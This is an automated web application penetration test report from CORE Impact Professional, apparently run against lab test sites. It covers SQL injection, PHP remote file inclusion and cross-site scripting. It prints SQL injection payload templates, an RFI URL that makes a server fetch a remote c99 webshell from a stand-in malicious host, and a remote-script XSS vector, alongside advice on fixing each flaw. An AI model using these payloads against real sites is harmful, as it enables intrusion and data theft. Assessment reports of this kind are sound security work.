Webapps Vulnerability Report



Similar documents
Check list for web developers

SQL Injection January 23, 2013

Magento Security and Vulnerabilities. Roman Stepanov

Web Application Security

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION

SQL INJECTION IN MYSQL

JOOMLA SECURITY. ireland website design. by Oliver Hummel. ADDRESS Unit 12D, Six Cross Roads Business Park, Waterford City

Web application security

Cross Site Scripting in Joomla Acajoom Component

Acunetix Website Audit. 5 November, Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build )

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

Testing Web Applications for SQL Injection Sam Shober

SECURING APACHE : THE BASICS - III

What about MongoDB? can req.body.input 0; var date = new Date(); do {curdate = new Date();} while(curdate-date<10000)

ASL IT SECURITY BEGINNERS WEB HACKING AND EXPLOITATION

Web Application Guidelines

Secure Web Application Coding Team Introductory Meeting December 1, :00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda

Web Application Attacks And WAF Evasion

Application security testing: Protecting your application and data

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

Threat Modeling. Categorizing the nature and severity of system vulnerabilities. John B. Dickson, CISSP

External Network & Web Application Assessment. For The XXX Group LLC October 2012

Cross Site Scripting (XSS) and PHP Security. Anthony Ferrara NYPHP and OWASP Security Series June 30, 2011

Understanding Web Application Security Issues

Advanced Web Security, Lab

WebCruiser Web Vulnerability Scanner User Guide

Protection, Usability and Improvements in Reflected XSS Filters

SQL Injection for newbie

Penetration Test Report

CS 558 Internet Systems and Technologies

White Paper. Blindfolded SQL Injection

Detection of SQL Injection and XSS Vulnerability in Web Application

Advanced PostgreSQL SQL Injection and Filter Bypass Techniques

Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek

Criteria for web application security check. Version

EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke

Automating SQL Injection Exploits

Retrieving Data Using the SQL SELECT Statement. Copyright 2006, Oracle. All rights reserved.

DIPLOMA IN WEBDEVELOPMENT

Practical Identification of SQL Injection Vulnerabilities

SQL injection: Not only AND 1=1. The OWASP Foundation. Bernardo Damele A. G. Penetration Tester Portcullis Computer Security Ltd

EC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.

Still Aren't Doing. Frank Kim

Cyber Security Workshop Ethical Web Hacking

Client vs. Server Implementations of Mitigating XSS Security Threats on Web Applications

Columbia University Web Security Standards and Practices. Objective and Scope

INTRUSION PROTECTION AGAINST SQL INJECTION ATTACKS USING REVERSE PROXY

OWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH January 17, Mega Conference

CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities

Security Awareness For Website Administrators. State of Illinois Central Management Services Security and Compliance Solutions

Application Security Testing. Erez Metula (CISSP), Founder Application Security Expert

FINAL DoIT v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES

Intrusion detection for web applications

1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications

Perl In Secure Web Development

Project 2: Web Security Pitfalls

Revisiting SQL Injection Will we ever get it right? Michael Sutton, Security Evangelist

SQL Injection Vulnerabilities in Desktop Applications

Integrated Network Vulnerability Scanning & Penetration Testing SAINTcorporation.com

Cloud Services. Anti-Spam. Admin Guide

Cross Site Scripting Prevention

Exposed Database( SQL Server) Error messages Delicious food for Hackers

Oracle Database 10g Express

Preventing SQL Injection and XSS Attacks. ACM Webmonkeys, 2011

ASL IT Security Advanced Web Exploitation Kung Fu V2.0

DataLogger Kepware, Inc.

MAS 500 Intelligence Tips and Tricks Booklet Vol. 1

Thick Client Application Security

How I hacked PacketStorm ( )

MWR InfoSecurity Security Advisory. pfsense DHCP Script Injection Vulnerability. 25 th July Contents

SQL Injection. By Artem Kazanstev, ITSO and Alex Beutel, Student

SQL Injection 2.0: Bigger, Badder, Faster and More Dangerous Than Ever. Dana Tamir, Product Marketing Manager, Imperva

How to hack a website with Metasploit

SECURE APPLICATION DEVELOPMENT CODING POLICY OCIO TABLE OF CONTENTS

Table of Contents SQL Server Option

Attack and Penetration Testing 101

Hack-proof Your Drupal App. Key Habits of Secure Drupal Coding

SQL Injection. The ability to inject SQL commands into the database engine through an existing application

VIDEO intypedia007en LESSON 7: WEB APPLICATION SECURITY - INTRODUCTION TO SQL INJECTION TECHNIQUES. AUTHOR: Chema Alonso

Guarding Against SQL Server Attacks: Hacking, cracking, and protection techniques.

3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management

Abusing HTML5. DEF CON 19 Ming Chow Lecturer, Department of Computer Science TuCs University Medford, MA

Server-Side JavaScript Injection Bryan Sullivan, Senior Security Researcher, Adobe Secure Software Engineering Team July 2011

Web Vulnerability Assessment Report

Network Security Web Security

Hack Proof Your Webapps

Blindfolded SQL Injection. Written By: Ofer Maor Amichai Shulman

FINAL DoIT v.8 APPLICATION SECURITY PROCEDURE

SysPatrol - Server Security Monitor

Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure

What is Web Security? Motivation

ODBC Client Driver Help Kepware, Inc.

Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security

SizmekFeatures. HTML5JSSyncFeature

Data Breaches and Web Servers: The Giant Sucking Sound

Braindumps.C questions

Transcription:

Tuesday, May 1, 2012 Webapps Vulnerability Report Introduction This report provides detailed information of every vulnerability that was found and successfully exploited by CORE Impact Professional during this test. This information provides a practical approach to determine the key vulnerable points in the tested scenarios, and to assess the risk associated with such vulnerabilities. This report consists of a list of vulnerabilities found divided by vulnerability type. Each section is preceded by a vulnerability description. Vulnerabilities background Code injection is a technique to introduce (or "inject") code into a computer program or system by taking advantage of the unenforced and unchecked assumptions the system makes about its inputs. The purpose of the injected code is typically to bypass or modify the originally intended functionality of the program. When the functionality bypassed is system security, the results can be disastrous. SQL Injection Vulnerabilities SQL injection vulnerabilities occur whenever input is used in the construction of an SQL query without being adequately constrained or sanitized. The use of dynamic SQL (the construction of SQL queries by string concatenation) opens the door to these vulnerabilities. SQL injection allows an attacker to access the SQL servers. It allows for the execution of SQL code under the privileges of the user used to connect to the database. There are two types of SQL injection vulnerabilities: error-based and blind. In error-based SQL injections the error message reported by the database, under an invalid query, is displayed to the user, allowing him to leverage information based on this output. However, in the case of blind SQL injections no error information is displayed to the user, increasing the difficulty of detection and exploitation of the vulnerability. One option is to only allow alphanumeric characters. There are other characters that can be allowed (e.g. _ ), but try to specifically avoid the following characters: (double quote), (single quote), ; (semicolon),, (colon), - (dash). Please remember that best practice is always restricting the allowed characters rather than ing out specific bad ones (e.g.: only allow alphanumeric characters and discard everything else, rather than just ing out single quotes). A word on fixing SQL Injection vulnerabilities Most SQL injection vulnerabilities can be easily fixed by avoiding the use of dynamically constructed SQL queries and using parameterized queries instead. If it s not possible to use parameterized queries because the string appended is not a data type (e.g.: the name of the table in a CREATE SQL statement), it is possible to /sanitize the string to ensure that it cannot be used to trigger SQL injection vulnerabilities. General Conclusions and Recommendations Use parameterized queries at the time of using user input in database queries. Recommendation: Never construct database queries by appending user input; rely on parameterized queries instead, which guarantee that the user input will not be treated as part of the SQL query, but merely as data CORE Impact Professional - Webapps Vulnerability Report Page 1

PHP Remote File Inclusion Vulnerabilities Remote file inclusion (RFI) is a technique used to attack internet websites from a computer. Remote File Inclusion attacks allow malicious users to run their own PHP code on a vulnerable website. The attacker is allowed to include his own malicious code in the space provided for PHP programs on a web page. For instance, a piece of vulnerable PHP code would look like this: include($page. '.php'); This line of PHP code, is then used in URLs like the following example: http://www.vulnerable.website.com/index.php?page=archive Because the $page variable is not specifically defined, an attacker can insert the location of a malicious file into the URL and execute it on the target server as in this example: http://www.vulnerable.website.com/index.php?page=http://www.malicious.code.com/c99.php? The include() function above instructs the server to retrieve C99.php from the remote server and run its code. This is possible because PHP allows the user to load both remote and local content with the same functions. The code sample above does not perform any checks on the content of the $page variable, it blindly passes it to the function. Because the original piece of code appended.php to the file it would try to fetch the following URL http://www.malicious.code.com/c99.php.php As the attackers can not know what the original code might append, they put a question mark at the end of the URLs. This makes the script fetch the intended file, with the appended string as a parameter (which is ignored by the attackers script): http://www.malicious.code.com/c99.php?.php This allows the attacker to include any remote file of his choice simply by editing the URL. Attackers commonly include a malicious PHP script called a webshell, also known as a PHP shell. A webshell can display the files and folders on the server and can edit, add or delete files, among other tasks. Scripts that send Spam are also very common. Potentially, the attacker could even use the webshell to gain administrator-level, or root, access on the server. RFI attacks are possible because of several PHP configuration flags: * One is called register_globals. register_globals automatically defines variables in the script that are entered in the page URL. In this example, the $page variable will automatically be filled with http://www.malicious.code.com/c99.php?archive.php before the script is executed. Because of this security vulnerability, register_globals is set to OFF by default on newer servers. * Another one, even more relevant to this attack, is allow_url_fopen. This defines if PHP should be able to fetch remote content in almost any function that takes a filename as a parameter. In PHP5 this setting was separated for the include () family of functions and called allow_url_include. This specifically addresses the fact that the attack described here makes up the majority of security holes in current PHP software. CORE Impact Professional - Webapps Vulnerability Report Page 2

Cross-Site Scripting Vulnerabilities Cross-Site Scripting (commonly referred to as XSS) attacks are the result of improper ing of input obtained from untrusted sources. Basically, they consist in the attacker injecting malicious tags and/or script code that is executed by the user's web browser when accessing the vulnerable web site. The injected code then takes advantage of the trust given by the user to the vulnerable site. These attacks are usually targeted to all users of a web application instead of the application itself (although one could say that the users are affected because of a vulnerability of the web application). The term cross -site scripting' is also sometimes used in a broader sense referring to different types of attacks involving script injection into the client. Cross-site Scripting (XSS): http://www.owasp.org/index.php/xss How To Prevent Cross-Site Scripting Security Issues: http://support.microsoft.com/default.aspx?scid=kb;en-us;q252985 The Cross-Site Scripting FAQ (XSS): http://www.cgisecurity.com/articles/xss-faq.shtml Workspace Summary Name: Started: Finished: Exact Time: Running Time: Reports 4/30/2012 4:05:09PM 5/1/2012 11:57:22AM 19 hours 52 minutes 13 seconds 1 hour 28 minutes 32 seconds SQL Injection Vulnerabilities SQL Injection Vulnerability State confirmed Agent Configured The parameter is being used without sanitization inside a SQL statement as a string, where it can be used to execute arbitrary SELECT statements and extract data using blind SQL injection techniques. The parameter is being used as a value for ing in the WHERE or HAVING clause of a SELECT statement without sanitization. The query being performed should look like SELECT... WHERE [column]='< parameter>' Basic Information URL Parameter Name Parameter Type Triggers http://www.vmcorelab.com/testcases/sqli/blind/sql_injection_string _error_rewrite.aspx?= GET "'" Backend Information CORE Impact Professional - Webapps Vulnerability Report Page 3

Database Engine Database Version Operating System Architecture Microsoft SQL Server Capabilities Data Read Add Modify Delete Files Read Write Execute Other Stored Procedures Admin Privileges Process Advanced Information Error Method Heuristic SqlErrorStringPage Attack Information Blind Using this vulnerability an attacker can extract arbitrary information from the database backend one bit at a time, crafting special input for the vulnerable field in the following way: <prefix>(case WHEN <arbitrary condition> THEN <true value> ELSE (SELECT <true value> UNION SELECT <true value>) END)<postfix> Where the page should provide a valid response if the condition is true, or an error if the condition is false. NOTE: For Oracle databases the (SELECT <true value> UNION SELECT <true value>) should be (SELECT <true value> FROM DUAL UNION SELECT <true value> FROM DUAL) instead, because the engine does not support SELECT statements without a FROM clause. Postfix True value '+ +' '' Union Select Using this vulnerability an attacker can extract arbitrary information from the database backend crafting special input for the vulnerable field in the following way: <prefix><arbitrary select statement><postfix> The <arbitrary select statement> must have the same number of columns and matching types as those described in 'query information'. The response page will include the results for those columns described as visible in 'query information'. ' AND 1=0 UNION ALL CORE Impact Professional - Webapps Vulnerability Report Page 4

Postfix -- Query Information Field Id Type Visible 0 varchar Yes 1 int Yes Request Information get Name Value %27 SQL Injection Vulnerability State confirmed Agent Configured The parameter is being used without sanitization inside a SQL statement as a number, where it can be used to execute arbitrary SELECT statements and extract data using blind SQL injection techniques. The parameter is being used as a value for ing in the WHERE or HAVING clause of a SELECT statement without sanitization. The query being performed should look like SELECT... WHERE [column]=< parameter> Basic Information URL Parameter Name Parameter Type Triggers http://www.vmcorelab.com/testcases/sqli/verbose/sql_injection_inte ger.aspx?= GET "@", "a", "--", "'", "A" Backend Information Database Engine Database Version Operating System Architecture Microsoft SQL Server Capabilities Data Read Add Modify Delete Files Read Write Execute Other Stored Procedures Admin Privileges Process CORE Impact Professional - Webapps Vulnerability Report Page 5

Advanced Information Error Method Heuristic HttpErrorCode Attack Information Blind Using this vulnerability an attacker can extract arbitrary information from the database backend one bit at a time, crafting special input for the vulnerable field in the following way: <prefix>(case WHEN <arbitrary condition> THEN <true value> ELSE (SELECT <true value> UNION SELECT <true value>) END)<postfix> Where the page should provide a valid response if the condition is true, or an error if the condition is false. NOTE: For Oracle databases the (SELECT <true value> UNION SELECT <true value>) should be (SELECT <true value> FROM DUAL UNION SELECT <true value> FROM DUAL) instead, because the engine does not support SELECT statements without a FROM clause. (1- Postfix ) True value 0 Union Select Using this vulnerability an attacker can extract arbitrary information from the database backend crafting special input for the vulnerable field in the following way: <prefix><arbitrary select statement><postfix> The <arbitrary select statement> must have the same number of columns and matching types as those described in 'query information'. The response page will include the results for those columns described as visible in 'query information'. Postfix -- 0 AND 1=0 UNION ALL Query Information Field Id Type Visible 0 varchar Yes 1 int Yes Request Information get Name Value A SQL Injection Vulnerability State confirmed Agent Configured CORE Impact Professional - Webapps Vulnerability Report Page 6

The parameter is being used without sanitization inside a SQL statement as a string, where it can be used to execute arbitrary SELECT statements and extract data using blind SQL injection techniques. The parameter is being used as a value for ing in the WHERE or HAVING clause of a SELECT statement without sanitization. The query being performed should look like SELECT... WHERE [column]='< parameter>' Basic Information URL Parameter Name Parameter Type Triggers http://www.vmcorelab.com/testcases/sqli/blind/remoteonly/sql_injec tion_string.aspx?= GET "'" Backend Information Database Engine Database Version Operating System Architecture Microsoft SQL Server Capabilities Data Read Add Modify Delete Files Read Write Execute Other Stored Procedures Admin Privileges Process Advanced Information Error Method Heuristic RedirectErrorDecoder Attack Information Blind Using this vulnerability an attacker can extract arbitrary information from the database backend one bit at a time, crafting special input for the vulnerable field in the following way: <prefix>(case WHEN <arbitrary condition> THEN <true value> ELSE (SELECT <true value> UNION SELECT <true value>) END)<postfix> Where the page should provide a valid response if the condition is true, or an error if the condition is false. NOTE: For Oracle databases the (SELECT <true value> UNION SELECT <true value>) should be (SELECT <true CORE Impact Professional - Webapps Vulnerability Report Page 7

value> FROM DUAL UNION SELECT <true value> FROM DUAL) instead, because the engine does not support SELECT statements without a FROM clause. Postfix True value '+ +' '' Union Select Using this vulnerability an attacker can extract arbitrary information from the database backend crafting special input for the vulnerable field in the following way: <prefix><arbitrary select statement><postfix> The <arbitrary select statement> must have the same number of columns and matching types as those described in 'query information'. The response page will include the results for those columns described as visible in 'query information'. Postfix -- ' AND 1=0 UNION ALL Query Information Field Id Type Visible 0 varchar Yes 1 int Yes Request Information get Name Value %27 SQL Injection Vulnerability State confirmed Agent Configured The parameter is being used without sanitization inside a SQL statement as a date/time, where it can be used to execute arbitrary SELECT statements and extract data using blind SQL injection techniques. The parameter is being used as a value for ing in the WHERE or HAVING clause of a SELECT statement without sanitization. The query being performed should look like SELECT... WHERE [column]='< parameter>' Basic Information URL Parameter Name Parameter Type Triggers http://sql.vmcorelab.com/testcases/sqli/verbose/sql_injection_linq _example_orderby_1.aspx?=&order=lastname GET "-1.0", "1.0", "-1", "1", "@", "a", "--", "'", "0", "A" Backend Information CORE Impact Professional - Webapps Vulnerability Report Page 8

Database Engine Microsoft SQL Server Database Version 9.00.1399.06 Operating System windows Architecture i386 Capabilities Data Read Add Modify Delete Files Read Write Execute Other Stored Procedures Admin Privileges Process Advanced Information Error Method Heuristic HttpErrorCode Attack Information Blind Using this vulnerability an attacker can extract arbitrary information from the database backend one bit at a time, crafting special input for the vulnerable field in the following way: <prefix>(case WHEN <arbitrary condition> THEN <true value> ELSE (SELECT <true value> UNION SELECT <true value>) END)<postfix> Where the page should provide a valid response if the condition is true, or an error if the condition is false. NOTE: For Oracle databases the (SELECT <true value> UNION SELECT <true value>) should be (SELECT <true value> FROM DUAL UNION SELECT <true value> FROM DUAL) instead, because the engine does not support SELECT statements without a FROM clause. Postfix True value '+UPPER( )+' '01-jun-01' Union Select Using this vulnerability an attacker can extract arbitrary information from the database backend crafting special input for the vulnerable field in the following way: <prefix><arbitrary select statement><postfix> The <arbitrary select statement> must have the same number of columns and matching types as those described in 'query information'. The response page will include the results for those columns described as visible in 'query information'. 01-jun-01' AND 1=0 UNION ALL CORE Impact Professional - Webapps Vulnerability Report Page 9

Postfix -- Query Information Field Id Type Visible 0 int Yes 1 varchar Yes 2 varchar Yes 3 varchar Yes 4 varchar Yes 5 datetime No 6 datetime No 7 varchar Yes 8 varchar Yes 9 varchar Yes 10 varchar Yes 11 varchar Yes 12 varchar Yes 13 varchar Yes 14 varchar No 15 int Yes 16 varchar Yes Request Information get Name Value order A LastName SQL Injection Vulnerability State confirmed Agent Configured The parameter is being used without sanitization inside a SQL statement as a number, where it can be used to execute arbitrary SELECT statements and extract data using blind SQL injection techniques. The parameter is being used as a column name in the ORDER BY clause of a SELECT statement without verifying the value is valid. The query being performed should look like SELECT... ORDER BY [column1, column2], <order parameter>[, column3, column4]... Basic Information URL http://sql.vmcorelab.com/testcases/sqli/verbose/sql_injection_linq _example_orderby_1.aspx?=&order=lastname CORE Impact Professional - Webapps Vulnerability Report Page 10

Parameter Name Parameter Type Triggers order GET "-1", "@", "a", "--", "'", "0", "A" Backend Information Database Engine Database Version Operating System Architecture Microsoft SQL Server Capabilities Data Read Add Modify Delete û û û Files Read û Write û Execute Other Stored Procedures û Admin Privileges Process û Advanced Information Error Method Heuristic HttpErrorCode Attack Information Blind Using this vulnerability an attacker can extract arbitrary information from the database backend one bit at a time, crafting special input for the vulnerable field in the following way: <prefix>(case WHEN <arbitrary condition> THEN <true value> ELSE (SELECT <true value> UNION SELECT <true value>) END)<postfix> Where the page should provide a valid response if the condition is true, or an error if the condition is false. NOTE: For Oracle databases the (SELECT <true value> UNION SELECT <true value>) should be (SELECT <true value> FROM DUAL UNION SELECT <true value> FROM DUAL) instead, because the engine does not support SELECT statements without a FROM clause. (1- Postfix ) True value 0 CORE Impact Professional - Webapps Vulnerability Report Page 11

Query Information Field Id Type Visible Request Information get Name Value order A PHP Remote File Inclusion Vulnerabilities PHP Remote File Inclusion Vulnerability State confirmed Agent Configured The 'module' parameter is being used as a parameter in a call to the PHP include() function, where it can be an URL controlled by the attacker having arbitrary PHP which will be executed in the vulnerable page. Basic Information URL Parameters http://php.vmcorelab.com/rfi/index.php?module=link1.php module Backend Information PHP Version Operating System Architecture 4.3.9 linux i386 Advanced Information Request Information Name module Value IMPACT_AGENT XSS Vulnerabilities HTML Cross-site scripting Vulnerability State confirmed Agent Configured There is a parameter that gets reflected to the user without proper sanitization. This leads to parameter Cross-Site scripting attacks. We use a vector that includes a remote malicious file to exploit this vulnerability. CORE Impact Professional - Webapps Vulnerability Report Page 12

Basic Information URL Where Parameter Name Parameter Type Persistent http://www.vmcorelab.com/testcases/sqli/blind/sql_injection_string _error_rewrite.aspx?= Parameter GET no Advanced Information Attack Information Template Postfix Type File Type <SCRIPT SRC=XSS></SCRIPT> < /><body> Remote JavaScript (js) Request Information get Name Value / %3E%3Cbody%3E%3CSCRIPT%20SRC%3Dhttp%3A//w ww.example.com/test%3frnd%3d1234567890%3e%3c/s CRIPT%3E%3C Browsers Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, Internet Explorer 9, Firefox 2, Firefox 3, Firefox 4, Netscape 8.1 (IE Mode), Netscape 8.1, Opera 9.02, Opera 11.01, Google Chrome 10.0, Safari 5.0.4 CORE Impact Professional - Webapps Vulnerability Report Page 13

Index Introduction Vulnerabilities Background Workspace Summary (Reports) SQL Injection Vulnerabilities PHP Remote File Inclusion Vulnerabilities XSS Vulnerabilities Page 3 3 3 3 12 12 CORE Impact Professional - Webapps Vulnerability Report Page 14

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information